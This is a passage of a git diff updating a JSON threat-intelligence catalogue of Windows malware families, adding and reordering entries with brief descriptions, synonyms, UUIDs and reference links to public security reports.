APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.\r\n\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "07470989-faac-44fb-b505-1d5568b3c716", + "value": "SHIPSHAPE" + }, { "description": "", "meta": { @@ -13531,8 +15496,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", "http://www.intezer.com/silenceofthemoles/", + "https://www.group-ib.com/resources/threat-research/silence.html", "https://securelist.com/the-silence/83009/", - "https://www.group-ib.com/resources/threat-research/silence.html" + "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/" ], "synonyms": [ "TrueBot" @@ -13672,6 +15638,19 @@ "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", "value": "Slingshot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1bc01fca-9a1e-4669-bd9d-8dd29416f9c1", + "value": "SLUB" + }, { "description": "", "meta": { @@ -13906,7 +15885,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", "https://attack.mitre.org/wiki/Software/S0157", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/", + "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" ], "synonyms": [ "denis" @@ -13916,6 +15897,19 @@ "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", "value": "SOUNDBITE" }, + { + "description": "SPACESHIP searches for files with a specified set of file extensions and copies them to\r\na removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive,\r\nwhich could be used to infect another victim computer, including an air-gapped computer. SPACESHIP is\r\nthen used to steal documents from the air-gapped system, copying them to a removable drive inserted\r\ninto the SPACESHIP-infected system", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "813e2761-6d68-493f-846b-2fc86d2e8079", + "value": "SPACESHIP" + }, { "description": "", "meta": { @@ -13968,7 +15962,7 @@ "synonyms": [], "type": [] }, - "uuid": "552745f4-6702-47a5-b517-9b099937573f", + "uuid": "", "value": "win.spynet_rat" }, { @@ -13989,7 +15983,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], @@ -14065,6 +16059,34 @@ "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", "value": "StarsyPound" }, + { + "description": "Potentially unwanted program that changes the startpage of browsers to induce ad impressions.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage", + "https://www.bleepingcomputer.com/virus-removal/remove-search-searchetan.com-chrome-new-tab-page" + ], + "synonyms": [ + "Easy Television Access Now" + ], + "type": [] + }, + "uuid": "033dbef5-eb51-4f7b-87e6-6dc4bef72841", + "value": "StartPage" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker", + "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d1c5a299-c072-44b5-be31-d03853bca5ea", + "value": "StealthWorker Go" + }, { "description": "", "meta": { @@ -14090,6 +16112,23 @@ "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", "value": "Stinger" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop", + "https://securelist.com/keypass-ransomware/87412/", + "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/" + ], + "synonyms": [ + "Djvu", + "KeyPass" + ], + "type": [] + }, + "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd", + "value": "STOP Ransomware" + }, { "description": "", "meta": { @@ -14139,7 +16178,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", - "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" + "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html", + "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" ], "synonyms": [], "type": [] @@ -14165,9 +16205,16 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox", + "https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1", + "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf", + "https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim", + "https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us" + ], + "synonyms": [ + "Bayrob", + "Nivdort" ], - "synonyms": [], "type": [] }, "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", @@ -14273,7 +16320,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], @@ -14372,7 +16419,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", - "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" + "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html", + "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1" ], "synonyms": [ "simbot" @@ -14460,6 +16508,34 @@ "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", "value": "TDTESS" }, + { + "description": "Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer.\r\nThis is achieved by sideloading another DLL among the legit TeamViewer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot", + "https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/" + ], + "synonyms": [ + "FINTEAM" + ], + "type": [] + }, + "uuid": "045469d0-5bb2-4ed9-9ee2-a0a08f437433", + "value": "TeamBot" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tefosteal", + "https://twitter.com/WDSecurity/status/1105990738993504256" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aaa05037-aee1-4353-ace1-43ae0f558091", + "value": "TefoSteal" + }, { "description": "", "meta": { @@ -14517,6 +16593,20 @@ "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", "value": "Terminator RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite", + "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", + "https://www.alienvault.com/blogs/labs-research/internet-of-termites" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c0801a29-ecc4-449b-9a1b-9d2dbde1995d", + "value": "Termite" + }, { "description": "", "meta": { @@ -14662,6 +16752,21 @@ "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", "value": "TinyLoader" }, + { + "description": "TinyMet is a meterpreter stager.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet", + "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/" + ], + "synonyms": [ + "TiniMet" + ], + "type": [] + }, + "uuid": "075c6fa0-e670-4fe1-be8b-b8b13714cb58", + "value": "TinyMet" + }, { "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.", "meta": { @@ -14791,33 +16896,40 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", - "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", + "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", + "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html", "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", "https://www.youtube.com/watch?v=KMcSAlS9zGE", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", - "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", + "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", - "http://www.malware-traffic-analysis.net/2018/02/01/", + "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", - "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "http://www.malware-traffic-analysis.net/2018/02/01/", + "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", @@ -14847,11 +16959,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", - "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", + "https://dragos.com/blog/trisis/TRISIS-01.pdf", + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", - "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", - "https://dragos.com/blog/trisis/TRISIS-01.pdf" + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", + "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf" ], "synonyms": [ "HatMan", @@ -14868,7 +16981,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", "https://github.com/5loyd/trochilus/", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://asert.arbornetworks.com/uncovering-the-seven-pointed-dagger/", + "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" ], "synonyms": [], @@ -14883,7 +16997,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", - "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/" + "https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/", + "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/", + "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", + "https://support.kaspersky.com/13059" ], "synonyms": [ "Shade" @@ -14922,7 +17039,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" ], "synonyms": [], "type": [] @@ -14972,6 +17090,22 @@ "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", "value": "UDPoS" }, + { + "description": "Information stealer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer", + "https://twitter.com/malwrhunterteam/status/1096363455769202688", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Usteal" + ], + "synonyms": [ + "Usteal" + ], + "type": [] + }, + "uuid": "a24bf6d9-e177-44f2-9e61-8cf3566e45eb", + "value": "UFR Stealer" + }, { "description": "", "meta": { @@ -15018,7 +17152,7 @@ "synonyms": [], "type": [] }, - "uuid": "ff80f82d-2556-4cda-8cf2-aa6b21d59dc9", + "uuid": "", "value": "win.unidentified_005" }, { @@ -15171,18 +17305,6 @@ "uuid": "799921d7-48e8-47a6-989e-487b527af37a", "value": "Unidentified 032" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033" - ], - "synonyms": [], - "type": [] - }, - "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", - "value": "Unidentified 033" - }, { "description": "", "meta": { @@ -15280,19 +17402,6 @@ "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", "value": "Unidentified 045" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046", - "https://twitter.com/DrunkBinary/status/1006534471687004160" - ], - "synonyms": [], - "type": [] - }, - "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", - "value": "Unidentified 046" - }, { "description": "RAT written in Delphi used by Patchwork APT.", "meta": { @@ -15306,19 +17415,6 @@ "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", "value": "Unidentified 047" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048", - "https://twitter.com/DrunkBinary/status/1002587521073721346" - ], - "synonyms": [], - "type": [] - }, - "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", - "value": "Unidentified 048 (Lazarus?)" - }, { "description": "", "meta": { @@ -15370,6 +17466,47 @@ "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", "value": "Unidentified 053 (Wonknu?)" }, + { + "description": "Unnamed downloader for win.wscspl as described in the 360ti blog post.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_055", + "https://www.freebuf.com/articles/database/192726.html", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b001ebb7-5d33-4972-96cc-56f9549dff27", + "value": "Unidentified 055" + }, + { + "description": "Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_057", + "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1b8e86ab-57b2-4cd9-a768-a7118b4eb4be", + "value": "Unidentified 057" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_058", + "https://securelist.com/the-evolution-of-brazilian-malware/74325/#rat", + "https://securelist.com/the-return-of-the-bom/90065/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bab52335-be9e-4fad-b68e-f124b0d69bbc", + "value": "Unidentified 058" + }, { "description": "", "meta": { @@ -15438,8 +17575,10 @@ "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", + "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", + "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/", "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" ], "synonyms": [ @@ -15456,8 +17595,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation", + "https://www.circl.lu/pub/tr-25/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193&sid=9fe4a57263c91a8b18bc43ae23afc453", "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", @@ -15478,11 +17619,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", + "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", + "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", - "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", - "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "Catch", @@ -15494,6 +17636,22 @@ "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", "value": "Vawtrak" }, + { + "description": "Delphi-based ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker", + "https://twitter.com/malwrhunterteam/status/1095024267459284992", + "https://twitter.com/malwrhunterteam/status/1093136163836174339" + ], + "synonyms": [ + "Vega" + ], + "type": [] + }, + "uuid": "704bb00f-f558-4568-824c-847523700043", + "value": "VegaLocker" + }, { "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ", "meta": { @@ -15526,7 +17684,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html" ], "synonyms": [], "type": [] @@ -15547,6 +17706,21 @@ "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", "value": "Vflooder" }, + { + "description": "Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar", + "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", + "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html", + "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1f44c08a-b427-4496-9d6d-909b6bf34b9b", + "value": "vidar" + }, { "description": "", "meta": { @@ -15565,8 +17739,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", + "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/", + "https://chrisdietri.ch/post/virut-resurrects/", + "https://www.secureworks.com/research/virut-encryption-analysis", "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/", - "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/" + "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", + "https://www.spamhaus.org/news/article/690/cooperative-efforts-to-shut-down-virut-botnet", + "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/" ], "synonyms": [], "type": [] @@ -15665,6 +17844,19 @@ "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", "value": "w32times" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wallyshack", + "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0bd92907-c858-4164-87d6-fec0f3595e69", + "value": "WallyShack" + }, { "description": "", "meta": { @@ -15893,11 +18085,12 @@ "value": "WebC2-Yahoo" }, { - "description": "", + "description": "On its website, Webmonitor RAT is described as 'a very powerful, user-friendly, easy-to-setup and state-of-the-art monitoring tool. Webmonitor is a fully native RAT, meaning it will run on all Windows versions and languages starting from Windows XP and up, and perfectly compatible with all crypters and protectors.'\r\nUnit42 notes in their analysis that it is offered as C2-as-a-service and raises the controversial aspect that the builder allows to create client binaries that will not show any popup or dialogue during installation or while running on a target system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" + "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/", + "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/" ], "synonyms": [], "type": [] @@ -15936,7 +18129,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], @@ -15952,11 +18145,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", "https://github.com/TKCERT/winnti-suricata-lua", - "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", - "https://github.com/TKCERT/winnti-nmap-script", "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", + "https://github.com/TKCERT/winnti-nmap-script", + "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", "https://github.com/TKCERT/winnti-detector", - "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", + "https://securelist.com/games-are-over/70991/", + "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf" ], "synonyms": [], "type": [] @@ -15964,6 +18159,22 @@ "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", "value": "Winnti (Windows)" }, + { + "description": "WinPot is created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot", + "https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/", + "https://securelist.com/atm-robber-winpot/89611/" + ], + "synonyms": [ + "ATMPot" + ], + "type": [] + }, + "uuid": "893a1da2-ae35-4877-8cde-3f532543af36", + "value": "WinPot" + }, { "description": "", "meta": { @@ -16062,16 +18273,30 @@ "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", "value": "Woolger" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "62fd2b30-55b6-474a-8d72-31e492357d11", + "value": "WSCSPL" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" ], "synonyms": [ @@ -16156,7 +18381,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", - 